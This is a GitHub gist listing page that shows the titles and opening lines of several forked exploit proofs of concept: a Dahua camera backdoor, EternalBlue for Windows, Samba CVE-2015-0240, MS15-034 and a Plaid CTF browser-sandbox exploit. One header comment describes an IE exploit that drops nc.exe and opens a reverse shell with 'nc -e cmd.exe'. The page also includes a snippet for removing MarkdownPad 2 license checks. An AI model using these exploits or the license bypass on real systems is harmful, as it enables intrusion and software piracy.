huyna
/ dahua-backdoor.py
Created
November 16, 2017 01:14
— forked from cre8tions/dahua-backdoor.py
dahua exploit poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2.7 | |
| # | |
| # Dahua backdoor Generation 2 and 3 | |
| # Author: bashis <mcw noemail eu> March 2017 | |
| # | |
| # Credentials: No credentials needed (Anonymous) | |
| #Jacked from git history | |
| # | |
| import string |
huyna
/ eternalblue8_exploit.py
Created
May 18, 2017 01:50
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
huyna
/ eternalblue_exploit.py
Created
May 16, 2017 07:59
— forked from worawit/eternalblue7_exploit.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
huyna
/ js_sandbox.js
Created
April 26, 2017 02:00
— forked from sroettger/js_sandbox.js
Exploit for the js_sandbox challenge of Plaid CTF 2016
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| with (true) { | |
| // f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16. | |
| // take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening | |
| function f(){ | |
| var x = 8; | |
| var y = 0xffffffff; | |
| var ind = x & y; | |
| x = 16; | |
| y = 0xffffffff; | |
| var ind2 = ind + (x&y); |
huyna
/ LicenseEngine.cs
Created
March 23, 2016 22:18
— forked from gythialy/LicenseEngine.cs
remove license validation of MarkdownPad 2 by Mono Cecil
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public bool VerifyLicense(string licenseKey, string email) | |
| { | |
| if (string.IsNullOrEmpty(licenseKey) || string.IsNullOrEmpty(email)) | |
| { | |
| return false; | |
| } | |
| try | |
| { | |
| this.License = this.Decrypt(licenseKey); | |
| this.LicenseProcessed = true; |
huyna
/ DexGuardDecoder.java
Created
March 9, 2016 12:05
— forked from AKosterin/DexGuardDecoder.java
New Dexguard String decoder for JEB 1.5. Tested on GFE 3.1.3. This release auto parse decoder function.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import jeb.api.IScript; | |
| import jeb.api.JebInstance; | |
| import jeb.api.ast.*; | |
| import jeb.api.ast.Class; | |
| import jeb.api.dex.*; | |
| import jeb.api.ui.JavaView; | |
| import jeb.api.ui.View; | |
| import java.util.Arrays; | |
| import java.util.HashMap; |
huyna
/ gist:41a8579ed9d86cf770f3
Created
February 26, 2016 03:44
— forked from bNull/gist:6003874
IDA Python script that will allow you to highlight a range of bytes and turn it into dwords (for manually fixing up tables or whatever).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # hotkey_utils.py - bNull | |
| # | |
| # Some useful shortcuts for binding to hotkeys. Current output/hotkeys: | |
| # | |
| # [+] Bound make_dwords to Ctrl-Alt-D | |
| # [+] Bound make_cstrings to Ctrl-Alt-A | |
| # [+] Bound make_offset to Ctrl-Alt-O | |
| import idaapi | |
| import idc |
huyna
/ cve-2015-0240_samba_exploit.py
Created
December 15, 2015 02:38
— forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
huyna
/ http_sys_pseudo.c
Created
December 15, 2015 02:37
— forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
| All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
| For anyone want to know what function are patched. | |
| Just open patched version and find all functions reference to RtlULongLongAdd(). | |
| */ | |
huyna
/ cve-2014-6332_exploit.html
Created
December 15, 2015 02:34
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
NewerOlder